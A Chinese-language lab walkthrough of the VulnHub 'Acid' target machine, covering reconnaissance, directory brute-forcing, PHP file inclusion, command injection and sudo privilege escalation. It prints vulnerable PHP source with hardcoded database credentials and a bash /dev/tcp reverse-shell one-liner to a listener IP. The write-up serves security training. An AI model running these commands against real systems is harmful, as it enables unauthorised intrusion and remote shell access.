Acid靶场渗透笔记
环境配置
靶机:https://download.vulnhub.com/acid/Acid.rar
渗透机:kali 2021系统
主机发现
利用arp-scan命令,扫描到靶机IP
信息收集
渗透第一步,信息收集少不了,利用nmap进行探测,发现开放33447端口
nmap -A -p- -sV 172.16.10.121
浏览器进行访问,发现此网站,有点小帅
渗透测试
看到此页面,查看源代码,发现一串16进制的数
转化成字符=> d293LmpwZw==, base64在转化=> wow.jpg
目录扫描
利用工具dirb扫描或dirsearch脚本扫描,发现images目录
利用上面解密出来的wow.jpg,加上/images进行访问,得到图片
继续操作,将图片下载下来查看是否存在信息,又发现一串奇怪字符,一看不又是16进制吗?再次解密,
利用certutil工具进行解密16进制
看到这串字符,感觉就像md5加密,上网站,解密!得到数字63425,这串数字暂时保留,继续干!
dirbuster (fuzz)爆破
继续分析,搞了半天,发现dirb和dirsearch也扫不到啥了,浏览器再看看源代码,发现了Challenge目录,访问一下
访问目录,得到登录框,进一步渗透
在Challenge目录尝试登录框登录,注入、弱口令都失败了,想了想,还是用上diruster进行进一步爆破目录
得到一下include.php、cake.php、hacked.php、index.php等php文件,浏览器访问,寻找渗透点
include.php
看到这个名字,include.php肯定得联想到文件包含啦,尝试加参数file进行php://filter/伪协议包含对应文件
包含index.php->解密base64->得到源代码
hacked.php
同样,也可以进行包含hacked.php、cake.php查看其源代码
```php
<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';
sec_session_start();
if (!isset($_SESSION['protected_page'])){
header('Location: protected_page.php');
exit;
}
if (!isset($_SESSION['index_page'])){
header('Location: protected_page.php');
exit;
}
?>
<!DOCTYPE html>
if(isset($_REQUEST['add']))
{
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'mehak';
$conn = mysql_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
die('Could not connect: ' . mysql_error());
}
$id = $_POST['id'];
$sql = "SELECT * FROM members WHERE ID = (('$id'))";
mysql_select_db('secure_login');
$retval = mysql_query( $sql, $conn );
if(! $retval )
{
die('Could not enter data: ' . mysql_error());
}
echo "You have entered ID successfully...Which is not a big deal :D\n";
mysql_close($conn);
}
?>
<p> <h1>You are going Good...Show me your Ninja Skills.</h1> <br>
<form method="get" action="<?php $_PHP_SELF ?>">
Enter your ID:<input name="id" placeholder="id" type="text" id="id" maxlength="20">
<input name="add" type="submit" id="add" value="Add ID">
</body>
</html>
```
cake.php
```php
<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';
?>
Ah.haan....There is long way to go..dude 
Please login
/ Come on....catch this file "tails.php" /
?>
```
访问一下hacked.php,访问一个id的框,感觉像是sql注入,尝试手工注入没成,开始sqlmap进行爆破,结果也失败了,emo了,可能思路不对,也将上面解密的md5值填进去,发现还是无果,继续进行分析
既然hacked.php不成,那就再看看cake.php呗,可能有惊喜,通过分析源代码,发现一个目录还没尝试
浏览器加上Magic_Box目录访问,爆权限问题,难道失败了吗,不对再想想,不会还要爆破吧!再上dirbuster爆破
再次爆破,改改参数继续,这波叫做峰回路转
真是车到山前必有路,爆出关键目录command.php、low.php、tail.php,感觉离getshell不远了
Command命令执行
访问command.php,命令执行!
getshell
拿起burp直接执行命令,发送到request包,发现执行命令成功
既然能执行查看目录语句的ls,不多想了,直接利用bash反弹木马辽
反弹语句:这里利用的是bash反弹
bash -c "bash -i >& /dev/tcp/172.16.10.155/3333 0>&1" 进行url编码执行
也可以利用python、php进行尝试,推荐模块exploit/multi/script/web_delivery,自行生成别的反弹木马
监听3333端口,执行反弹语句,成功getshell
提权
重头戏来了,进去靶机了,往往都是低权限,那么该怎么提权呢?开始操作
首先,个人思路,尝试寻找suid可用提权,眨眼一看好像有个sudo提权,其他的也不知道咋操作
find / -perm -u=s 2>/dev/null
先尝试吧,执行sudo -l回显这个sudo: no tty present and no askpass program specified
那应该是没有终端的意思,执行python开启虚拟终端
python -c 'import pty;pty.spawn("/bin/bash")'
虽然说是sudo提权,但不过需要密码,那密码又从何来找呢?阿巴巴,对着文件进行分析,分析一下home目录吧
进行查看,发现存在acid和saman家目录,看下/etc/passwd文件也发现,就利用这两个用户继续干!
find / -user acid 2>/dev/null 看到一个数据包!(hint.pcapng)
下载一波到攻击机,看看还有啥关键信息,利用python+wget
分析数据包,这点没怎么想到,想了很久,不会密码藏在里面吧。。
过滤一手tcp协议,分析一手,看到一个saman用户,后面跟着一串字符,1337hax0r,不会就是密码吧!尝试一手
切换saman用户,利用1337hax0r登录,好吧真是,运气还算不错。
sudo成功拿下root权限,提权成功舒服了
总结:这台靶机还是颇有意思的,也算有所体会吧,写下了这篇靶场小笔记,如若有误,请各位大佬们指出,thank!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
- 本文由 admin 发表于 2022年1月28日02:37:29
- 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
网络安全从0到0.5之Acid靶机实战渗透测试https://cn-sec.com/archives/757916.html
评论